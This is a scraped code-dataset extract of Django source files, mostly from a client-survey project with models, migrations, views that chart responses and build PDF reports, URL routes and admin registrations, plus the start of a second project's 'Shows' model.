        return "(" + self.ques_id.ques_text + ") " + self.choice_text
class SurveyResponse(models.Model):
    """A single user's answer to one survey question."""
    company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
    ques_id = models.ForeignKey(SurveyQuestion, on_delete=models.CASCADE)
    # Stored as plain text for both free-text and choice answers.
    user_response = models.CharField(max_length=255)
    def __str__(self):
        return self.user_response
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,503
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/views.py
|
from django.shortcuts import render
from django.views import generic
from .models import Clients
class indexView(generic.ListView):
    """
    Handle index page request.

    Renders ts/index.html with every client exposed to the template as
    `latest_survey_list`.
    """
    template_name = 'ts/index.html'
    context_object_name = 'latest_survey_list'
    def get_queryset(self):
        # No filtering or ordering: list every client row.
        return Clients.objects.all()
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,504
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0006_surveyquestion_ques_category.py
|
# Generated by Django 3.1 on 2021-07-10 05:52
from django.db import migrations, models
class Migration(migrations.Migration):
    # Re-adds the ques_category column (removed in 0005) with a default so
    # existing rows get 'GENERAL'.
    dependencies = [
        ('client', '0005_remove_surveyquestion_ques_category'),
    ]
    operations = [
        migrations.AddField(
            model_name='surveyquestion',
            name='ques_category',
            field=models.CharField(default='GENERAL', max_length=255),
        ),
    ]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,505
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/urls.py
|
from django.urls import path
from . import views
app_name = "client"
urlpatterns = [
path('<int:pk>/', views.index, name='index'),
path('<int:pk>/survey/', views.survey, name='survey'),
path('<int:pk>/save/', views.save, name='save'),
path('<int:pk>/feedback/', views.feedback, name='feedback')
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,506
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0003_auto_20210708_2332.py
|
# Generated by Django 3.1 on 2021-07-08 23:32
from django.db import migrations, models
class Migration(migrations.Migration):
    # Extends the ques_type choices with a third option, MULTI CHOICE.
    dependencies = [
        ('client', '0002_auto_20210702_1731'),
    ]
    operations = [
        migrations.AlterField(
            model_name='surveyquestion',
            name='ques_type',
            field=models.IntegerField(choices=[(1, 'TEXT'), (2, 'CHOICE'), (3, 'MULTI CHOICE')], default=1),
        ),
    ]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,507
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/admin.py
|
from django.contrib import admin
from .models import Clients
admin.site.register(Clients)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,508
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0005_auto_20210625_1054.py
|
# Generated by Django 3.1 on 2021-06-25 10:54
from django.db import migrations, models
class Migration(migrations.Migration):
    # Alters Clients.status to an IntegerField defaulting to 1.
    dependencies = [
        ('ts', '0004_auto_20210625_1053'),
    ]
    operations = [
        migrations.AlterField(
            model_name='clients',
            name='status',
            field=models.IntegerField(default=1),
        ),
    ]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,509
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0006_auto_20210625_1055.py
|
# Generated by Django 3.1 on 2021-06-25 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
    # Makes Clients.company_id an auto-incrementing primary key.
    dependencies = [
        ('ts', '0005_auto_20210625_1054'),
    ]
    operations = [
        migrations.AlterField(
            model_name='clients',
            name='company_id',
            field=models.AutoField(primary_key=True, serialize=False),
        ),
    ]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,510
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0009_auto_20210710_1349.py
|
# Generated by Django 3.1 on 2021-07-10 13:49
from django.db import migrations
class Migration(migrations.Migration):
    # Fixes the 'SyrveyResponse' typo by renaming the model to
    # SurveyResponse.
    dependencies = [
        ('ts', '0012_auto_20210701_1820'),
        ('client', '0008_syrveyresponse'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='SyrveyResponse',
            new_name='SurveyResponse',
        ),
    ]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,511
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/admin.py
|
from django.contrib import admin
from .models import SurveyQuestion, SurveyQuestionChoice
admin.site.register(SurveyQuestion)
admin.site.register(SurveyQuestionChoice)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,512
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0007_auto_20210625_1133.py
|
# Generated by Django 3.1 on 2021-06-25 11:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0006_auto_20210625_1055'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='name',
new_name='client_name',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,513
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/apps.py
|
from django.apps import AppConfig
class TsConfig(AppConfig):
name = 'ts'
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,514
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0012_auto_20210701_1820.py
|
# Generated by Django 3.1 on 2021-07-01 18:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0011_auto_20210628_1647'),
]
operations = [
migrations.RemoveField(
model_name='surveyquestionchoice',
name='company_id',
),
migrations.RemoveField(
model_name='surveyquestionchoice',
name='ques_id',
),
migrations.DeleteModel(
name='SurveyQuestion',
),
migrations.DeleteModel(
name='SurveyQuestionChoice',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,515
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0010_auto_20210625_1222.py
|
# Generated by Django 3.1 on 2021-06-25 12:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ts', '0009_auto_20210625_1208'),
]
operations = [
migrations.AlterField(
model_name='surveyquestionchoice',
name='company_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients'),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,516
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0001_initial.py
|
# Generated by Django 3.1 on 2021-07-01 18:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('ts', '0012_auto_20210701_1820'),
]
operations = [
migrations.CreateModel(
name='SurveyQuestion',
fields=[
('ques_id', models.AutoField(primary_key=True, serialize=False)),
('ques_type', models.IntegerField(default=0)),
('ques_text', models.CharField(max_length=255)),
('ques_meta_1', models.CharField(max_length=255)),
('ques_meta_2', models.CharField(max_length=255)),
('company_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients')),
],
),
migrations.CreateModel(
name='SurveyQuestionChoice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=255)),
('company_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ts.clients')),
('ques_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='client.surveyquestion')),
],
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,517
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0011_auto_20210628_1647.py
|
# Generated by Django 3.1 on 2021-06-28 16:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0010_auto_20210625_1222'),
]
operations = [
migrations.AlterModelOptions(
name='clients',
options={'verbose_name_plural': 'Clients'},
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,518
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/views.py
|
from django.shortcuts import render, get_object_or_404, get_list_or_404
from django.db.models import Count, Avg, Max, Min
from ts.models import *
from .models import SurveyQuestion, SurveyQuestionChoice, SurveyResponse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from fpdf import FPDF
class PDF(FPDF):
def __init__(self, client_name):
super().__init__()
self.WIDTH = 210
self.HEIGHT = 297
self.name = client_name
def header(self):
self.image('ts/static/ts/index.png', 10, 3, 33)
self.set_font('Arial', 'B', 11)
self.cell(self.WIDTH - 80)
self.cell(60, 1, self.name.upper() + ' SURVEY REPORT', 0, 0, 'R')
self.ln(20)
def footer(self):
self.set_y(-15)
self.set_font('Arial', 'I', 8)
self.set_text_color(128)
self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')
def page_body(self, images):
self.image(images, 15, 35, self.WIDTH)
def print_page(self, images):
self.add_page()
self.page_body(images)
def index(request, pk):
"""
This view is for
creating dynamic
and personalized
client home page
"""
ques_obj = SurveyQuestion.objects.filter(company_id=pk)
res_obj = SurveyResponse.objects.filter(company_id=pk)
total_survey_question = ques_obj.count()
total_survey_response = res_obj.count()//total_survey_question
stats_list = []
charts = []
for q in ques_obj:
if q.ques_type == 1:
res_obj = SurveyResponse.objects.filter(ques_id_id = q.ques_id)
stat_dic = res_obj.aggregate( \
Avg('user_response'), \
Max('user_response'), \
Min('user_response'))
stat_dic['ques'] = q.ques_text
stats_list.append(stat_dic)
elif q.ques_type == 2:
choice_list = []
res_list = []
stats = []
res_obj = SurveyResponse.objects.filter(ques_id_id = q.ques_id)
choice_obj = SurveyQuestionChoice.objects.filter(ques_id_id = q.ques_id)
choice_list = [c.choice_text for c in choice_obj]
res_list = [r.user_response for r in res_obj]
stats = [res_list.count(i) for i in set(res_list)]
name = str(q.company_id_id) + '_' + str(q.ques_id)
plt.pie(stats, labels=set(res_list), autopct='%1.0f%%')
plt.title(q.ques_text)
plt.legend()
plt.savefig('client/static/client/charts/' + name + '.png', \
transparent=True)
plt.close()
charts.append(name)
context = {
'client': get_object_or_404(Clients, pk=pk),
'total_ques': total_survey_question,
'total_response': total_survey_response,
'charts': charts,
'stats': stats_list
}
pdf = PDF(context['client'].client_name)
for i in charts:
pdf.print_page('client/static/client/charts/' + i + '.png')
pdf.output('client/static/client/' + str(pk) +'.pdf', 'F')
return render(request, "client/index.html", context)
def survey(request, pk):
"""
This view is for
creating dynamic
and personalized
client survey page
"""
context = {
'client': get_object_or_404(Clients, pk=pk),
'categories': SurveyQuestion.objects.filter(company_id=pk).values('ques_category').annotate(Count('ques_category')).order_by(),
'ques_set': SurveyQuestion.objects.filter(company_id=pk),
'choice_set': SurveyQuestionChoice.objects.filter(company_id=pk)
}
return render(request, "client/survey.html", context)
def save(request, pk):
"""
This view is for
saving participant
response into db
"""
context = {
'client': get_object_or_404(Clients, pk=pk)
}
for res in request.POST:
if res == "csrfmiddlewaretoken" or res == "submit":
continue
response = SurveyResponse(
company_id = Clients.objects.get(pk=pk),
ques_id = SurveyQuestion.objects.get(pk=int(res)),
user_response=request.POST[res]
)
response.save()
return render(request, "client/thanks.html", context)
def feedback(request, pk):
"""
This view is for
saving participant
feedback regarding
survey
"""
context = {'client': get_object_or_404(Clients, pk=pk)}
return render(request, "client/feedback.html", context)
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,519
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0004_auto_20210625_1053.py
|
# Generated by Django 3.1 on 2021-06-25 10:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ts', '0003_auto_20210625_1052'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='client_name',
new_name='name',
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,520
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0002_auto_20210625_1050.py
|
# Generated by Django 3.1 on 2021-06-25 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='clients',
old_name='client_name',
new_name='name',
),
migrations.RemoveField(
model_name='clients',
name='id',
),
migrations.AddField(
model_name='clients',
name='company_id',
field=models.IntegerField(default=1, primary_key=True, serialize=False),
preserve_default=False,
),
migrations.AddField(
model_name='clients',
name='status',
field=models.IntegerField(default=1),
preserve_default=False,
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,521
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/migrations/0002_auto_20210702_1731.py
|
# Generated by Django 3.1 on 2021-07-02 17:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='surveyquestion',
name='ques_type',
field=models.IntegerField(choices=[(1, 'TEXT'), (2, 'CHOICE'), (3, 'MULTI CHOICE')], default=0),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,522
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/models.py
|
from django.db import models
class Clients(models.Model):
company_id = models.AutoField(primary_key=True)
client_name = models.CharField(max_length=100)
survey_start_date = models.DateTimeField()
status = models.IntegerField(default=1)
class Meta:
verbose_name_plural = "Clients"
def __str__(self):
return self.client_name
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,523
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0009_auto_20210625_1208.py
|
# Generated by Django 3.1 on 2021-06-25 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0008_surveyquestion_surveyquestionchoice'),
]
operations = [
migrations.AlterField(
model_name='surveyquestion',
name='ques_id',
field=models.AutoField(primary_key=True, serialize=False),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,524
|
yhtps237/ostendit
|
refs/heads/master
|
/shows/migrations/0006_auto_20200527_0939.py
|
# Generated by Django 2.2.1 on 2020-05-27 05:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shows', '0005_auto_20200525_1600'),
]
operations = [
migrations.AlterField(
model_name='shows',
name='title',
field=models.CharField(max_length=200),
),
]
|
{"/shows/views.py": ["/shows/models.py", "/shows/forms.py", "/comments/models.py", "/comments/forms.py"], "/pages/views.py": ["/shows/models.py"], "/shows/forms.py": ["/shows/models.py"], "/shows/urls.py": ["/shows/views.py"], "/user/views.py": ["/shows/models.py"], "/shows/admin.py": ["/shows/models.py"], "/user/urls.py": ["/user/views.py"], "/comments/forms.py": ["/comments/models.py"]}
|
34,525
|
yhtps237/ostendit
|
refs/heads/master
|
/shows/models.py
|
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.db.models import Q
# Create your models here.
User = settings.AUTH_USER_MODEL
class ShowsGetQuerySet(models.QuerySet):
def published(self):
now = timezone.now()
return self.filter(published__lte=now)
def search(self, q):
lookup = (
Q(title__icontains=q) |
Q(slug__icontains=q) |
Q(content__icontains=q) |
Q(user__username__icontains=q) |
Q(user__first_name__icontains=q) |
Q(user__last_name__icontains=q))
return self.filter(lookup)
class ShowsManager(models.Manager):
def get_queryset(self):
return ShowsGetQuerySet(self.model, using=self._db)
def published(self):
return self.get_queryset().published()
def search(self, q):
if q is None:
return self.get_queryset().none()
return self.get_queryset().published().search(q)
class Shows(models.Model):
user = models.ForeignKey(
User, on_delete=models.SET_NULL, default=1, blank=True, null=True)
title = models.CharField(max_length=200)
slug = models.SlugField(unique=False)
image = models.ImageField(upload_to='image/', blank=True)
content = models.TextField(blank=True)
animation = models.BooleanField()
published = models.DateTimeField(
auto_now=False, auto_now_add=False, blank=True, null=True)
timestamp = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
objects = ShowsManager()
class Meta:
ordering = ['-published', '-timestamp', '-updated']
def get_absolute_url(self):
return f'/shows/{self.user}/{self.slug}/'
def get_update_url(self):
return f'{self.get_absolute_url()}edit/'
def get_delete_url(self):
return f'{self.get_absolute_url()}delete/'
def __str__(self):
return f'{self.user} | {self.title}'
|
{"/shows/views.py": ["/shows/models.py", "/shows/forms.py", "/comments/models.py", "/comments/forms.py"], "/pages/views.py": ["/shows/models.py"], "/shows/forms.py": ["/shows/models.py"], "/shows/urls.py": ["/shows/views.py"], "/user/views.py": ["/shows/models.py"], "/shows/admin.py": ["/shows/models.py"], "/user/urls.py": ["/user/views.py"], "/comments/forms.py": ["/comments/models.py"]}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.